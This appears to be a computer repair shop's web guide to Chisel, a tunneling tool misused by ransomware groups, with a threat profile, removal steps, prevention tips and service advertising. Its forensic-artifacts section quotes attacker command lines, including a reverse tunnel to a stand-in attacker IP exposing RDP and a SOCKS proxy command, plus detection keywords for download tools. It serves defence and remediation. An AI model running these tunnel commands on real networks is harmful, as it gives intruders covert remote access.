Chisel is an open-source networking tool designed for legitimate system administration and penetration testing, but it has been weaponized by ransomware gangs and advanced persistent threat groups to tunnel malicious traffic through firewalls and maintain covert backdoor access. Originally created by developer Jaime Pillora as a TCP/UDP-over-HTTP tunneling utility, Chisel's flexibility and cross-platform nature make it attractive to attackers who need to bypass network security controls without writing custom malware. When found running on systems without administrator knowledge, it typically indicates an active intrusion where attackers are moving laterally through your network or maintaining persistent remote access.

Chisel — cybersecurity illustration
Photo by Sora Shimazaki on Pexels
If you suspect Chisel is running on your computer right now: Disconnect from the internet immediately (unplug ethernet or disable Wi-Fi). Do not attempt to use the machine for banking, email, or other sensitive activities. Call Computer Repair Roswell at (770) 667-9098 or bring the system to our shop at 1235 Hembree Road. Active tunneling tools mean an attacker may have real-time access to your files and keystrokes.

Threat Profile

AttributeDetails
Canonical NameChisel
Malware ClassificationPost-exploitation tool / Network tunneling utility
PlatformWindows (also available for Linux, macOS, FreeBSD)
File TypeWindows PE executable (compiled Go binary)
Typical File Size7–10 MB (varies by version and compression)
Primary Use by Threat ActorsPersistence, command-and-control tunneling, lateral movement
First Observed in Wild (Legitimate Release)2015 (weaponized observations from 2019 onward)
Known Ransomware AssociationsPYSA (Mespinoza), Conti, BlackCat/ALPHV, LockBit
Distribution MethodDropped by other malware, manual attacker deployment
Detection Names (AV Engines)HackTool:Win64/Chisel, PUA:Win32/Chisel, Tool.Chisel
Legitimate Use CasesPenetration testing, remote support, SSH tunneling replacement
Malpedia Last Updated2026-06-09

How It Spreads

Unlike traditional malware that spreads through phishing emails or exploit kits, Chisel almost never arrives on its own. It is a second-stage tool deployed after an attacker has already compromised your system through other means. In most cases, threat actors gain initial access via phishing, stolen credentials, unpatched vulnerabilities in internet-facing services, or trojanized software downloads. Once they have a foothold, they use remote desktop protocols, stolen admin credentials, or other backdoors to manually upload and execute Chisel.

The tool's legitimate origins make it invisible to many security controls—antivirus engines often classify it as a "potentially unwanted application" or "hacktool" rather than outright malware, and some enterprise environments even whitelist it if penetration testers use it during authorized assessments. Attackers exploit this ambiguity, sometimes renaming the executable to mimic legitimate system files (svchost.exe, csrss.exe, or Windows utility names) to avoid drawing attention during casual inspection.

Common infection chains that lead to Chisel deployment include:

  • Ransomware campaigns: Groups like PYSA and Conti drop Chisel to maintain access even after initial payloads are detected, allowing them to re-enter the network if defenders remove the primary ransomware binary.
  • Business email compromise (BEC): Attackers with stolen Office 365 credentials use Chisel to tunnel into internal networks from the public internet, bypassing firewall rules.
  • Supply chain attacks: Compromised managed service provider (MSP) tools or remote monitoring software can be used to push Chisel to dozens or hundreds of endpoints simultaneously.
  • Living-off-the-land tradecraft: Advanced attackers pair Chisel with PowerShell or other built-in Windows tools to create multi-hop proxy chains that obscure the true command-and-control server location.
  • Insider threats: Disgruntled employees or contractors with legitimate network access may install Chisel to exfiltrate data over encrypted tunnels that evade data loss prevention systems.

What It Does On Your Machine

Chisel operates as both a client and server, creating encrypted tunnels that forward network traffic through HTTP or HTTPS connections. When attackers deploy it on a compromised Windows machine, they typically run it in client mode, connecting back to a Chisel server they control on the public internet or on another compromised host within your network. This tunnel allows them to route commands, file transfers, and remote desktop sessions through your machine as if they were sitting at the keyboard, all while appearing to network monitoring tools as ordinary web traffic.

The tool requires minimal configuration—a single command-line invocation can establish a persistent tunnel. Once running, Chisel consumes modest system resources but maintains an open connection that attackers use for reconnaissance, data theft, privilege escalation, and lateral movement. Because the traffic is encapsulated in HTTP/HTTPS, traditional firewall rules that block unusual protocols or ports are ineffective. The connection often appears as outbound web traffic to legitimate-looking domains (attackers sometimes use cloud hosting providers or compromised web servers as relay points).

In PYSA ransomware incidents specifically, researchers observed Chisel being used to maintain access during the multi-day reconnaissance phase before encryption. Attackers would tunnel RDP sessions through Chisel, allowing them to manually explore file shares, identify backup systems, and locate high-value data for exfiltration—all while security teams remained unaware of the intrusion. The tool's logging is minimal by default, leaving few forensic traces beyond process execution and network connection records.

Typical Chisel Deployment Artifacts (observed in sandbox and incident reports): C:\Users\[username]\AppData\Local\Temp\chisel.exe // Common staging location C:\Windows\System32\svchost.exe (renamed Chisel binary) C:\ProgramData\SystemData\chisel_client.exe Command-line patterns (from forensic analysis): chisel.exe client --keepalive 30s --max-retry-count -1 https://[attacker-IP]:8443 R:3389:127.0.0.1:3389 // Reverse tunnel for RDP chisel.exe client http://192.168.1.50:9000 socks // SOCKS proxy for lateral movement Network indicators (connection patterns): Outbound HTTPS to cloud providers (AWS, Azure, DigitalOcean) on non-standard ports (8443, 8080, 9443) Long-duration TCP connections with periodic keepalive traffic HTTP User-Agent: Go-http-client/1.1 // Default for Go-based tools Process characteristics: Parent process: cmd.exe, powershell.exe, or scheduled task (SYSTEM account) No GUI window; runs as console application or background service May be configured as Windows service with auto-start

The tool's stealthy nature means many victims never realize they've been compromised until ransomware deploys or suspicious bank transactions appear. By the time Chisel is discovered, attackers have often had unfettered network access for days or weeks.

Manual Removal — Step by Step

01

Isolate the System

Disconnect from all networks immediately—unplug ethernet cables and disable Wi-Fi. Do not shut down the computer yet (this preserves memory for forensics). If this is a work machine, notify your IT department or security team before proceeding. For home users, keep the system isolated until the removal process is complete.

02

Document Running Processes

Open Task Manager (Ctrl+Shift+Esc). Switch to the Details tab and look for unfamiliar processes, especially those named "chisel.exe" or Go-compiled binaries (7–10 MB in size, often running under SYSTEM or your user account). Take screenshots. Right-click suspicious processes and select "Open file location" to identify the executable path before terminating.

03

Terminate Chisel Processes

In Task Manager, select the chisel.exe process (or renamed variants) and click "End Task." If the process immediately respawns, it's being launched by a scheduled task or service. Note the process ID and command-line arguments if visible. You may need to open Command Prompt as Administrator and use taskkill /F /IM chisel.exe to force termination.

04

Check Scheduled Tasks and Services

Open Task Scheduler (search Start menu) and review the Task Scheduler Library. Look for recently created tasks with unfamiliar names or triggers set to "At system startup" or "At log on." Delete any tasks that reference chisel.exe or suspicious paths. Next, open Services (services.msc) and look for unauthorized services—sort by "Startup Type" to find automatic services you don't recognize.

05

Delete Chisel Executables

Navigate to the file paths identified in Step 2. Common locations include C:\Users\[username]\AppData\Local\Temp\, C:\ProgramData\, and C:\Windows\Temp\. Delete all chisel.exe files and any renamed copies. Check for hidden files (in File Explorer, View tab → Options → Show hidden files). Use Shift+Delete to bypass Recycle Bin.

06

Inspect Registry Startup Entries

Press Win+R, type regedit, and navigate to these keys: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Look for entries pointing to chisel.exe or unknown executables. Right-click and delete suspicious entries. Also check HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services for manually created services.

07

Scan with Multiple Antivirus Engines

Run a full system scan with your installed antivirus. Then download and run secondary scanners like Malwarebytes, HitmanPro, or Microsoft Safety Scanner (all free). Chisel may be flagged as "PUA" (potentially unwanted application) or "HackTool"—remove all detections. Reboot in Safe Mode (hold Shift while clicking Restart, then Troubleshoot → Advanced → Startup Settings → Safe Mode) and scan again.

08

Review User Accounts and Passwords

Open Computer Management (compmgmt.msc) and check Local Users and Groups. Look for unauthorized administrator accounts. If you find any, disable or delete them. Change passwords for all local and domain accounts accessed from this machine, especially administrator accounts. Enable two-factor authentication on all critical accounts (email, banking, work VPN).

09

Check Firewall and Network Settings

Open Windows Defender Firewall with Advanced Security. Review outbound rules for any entries you didn't create, especially those allowing connections on ports 8443, 8080, or 9443. Delete unauthorized rules. Check your network adapter settings (ncpa.cpl) for unusual proxy configurations or static DNS servers—reset to automatic if tampering is suspected.

10

Consider Full System Rebuild

If Chisel was part of a ransomware incident or if you find evidence of additional backdoors, the safest approach is a complete Windows reinstall from trusted media. Attackers who deploy Chisel often leave multiple persistence mechanisms. Back up critical files to an external drive (scan them separately on a clean system before restoring), then wipe and reinstall Windows. Restore files but not applications or system images—reinstall software from official sources only.

Prevention

  1. Implement application whitelisting: Use Windows Defender Application Control (WDAC) or third-party solutions to prevent execution of unauthorized executables, especially in Temp folders and user profile directories. This blocks most post-exploitation tools including Chisel.
  2. Monitor outbound network traffic: Deploy endpoint detection and response (EDR) software or configure your firewall to alert on long-duration HTTPS connections to unusual ports (8080, 8443, 9443) or cloud hosting providers. Look for HTTP User-Agent strings associated with automation tools (Go-http-client, curl, python-requests).
  3. Restrict local administrator privileges: Limit the number of accounts with admin rights. Attackers need elevated privileges to install services or modify system directories—standard user accounts significantly reduce the attack surface. Use separate accounts for daily work and administrative tasks.
  4. Enable PowerShell logging and script block monitoring: Many Chisel deployments use PowerShell for download and execution. Configure Windows Event Logging to capture PowerShell commands (Event IDs 4103, 4104) and review logs regularly for suspicious download patterns (Invoke-WebRequest, certutil, bitsadmin).
  5. Patch systems promptly: While Chisel itself doesn't exploit vulnerabilities, attackers gain initial access through unpatched software. Prioritize updates for Windows, web browsers, VPN gateways, and internet-facing applications. Enable automatic updates where feasible.
  6. Train staff on phishing recognition: The majority of intrusions that lead to Chisel deployment start with phishing emails. Conduct regular security awareness training focused on identifying credential harvesting attempts, malicious attachments, and social engineering tactics. Use simulated phishing campaigns to reinforce lessons.
  7. Segment your network: Separate critical systems (file servers, databases, backup infrastructure) from general workstations using VLANs and firewall rules. This limits an attacker's ability to use Chisel for lateral movement even if one endpoint is compromised.
  8. Monitor scheduled tasks and services: Use Group Policy or third-party tools to alert when new scheduled tasks or services are created, especially on non-server systems. Regularly audit these mechanisms for unauthorized persistence—attackers rely on users not checking these locations.
Computer Repair Roswell's 90-Day Warranty: When you bring your infected machine to our shop, we don't just remove Chisel—we investigate the full scope of the compromise, eliminate all persistence mechanisms, and verify your system is clean through multi-engine scanning. If any related malware resurfaces within 90 days of our service, we'll re-clean your system at no additional charge. We stand behind our work because we know how determined these attackers can be.

Bring It In

Chisel infections signal a serious security breach that extends beyond a single piece of malware. If you've discovered this tool on your computer, there's a strong possibility that attackers have accessed your files, stolen credentials, and potentially installed additional backdoors. Our team at Computer Repair Roswell has extensive experience with post-intrusion forensics and remediation—we'll identify how attackers gained access, what they may have taken, and ensure every trace of their presence is eliminated. We work with both home users dealing with personal data theft and small businesses recovering from ransomware incidents.

Located at 1235 Hembree Road in Roswell, we offer same-day diagnostics and transparent pricing with no hidden fees. Call us at (770) 667-9098 to describe your situation, or bring your computer directly to the shop during business hours. We'll explain our findings in plain English, walk you through the evidence we discover, and provide written documentation for insurance claims or law enforcement reports if needed. Don't let attackers maintain access to your digital life—let's shut them out permanently.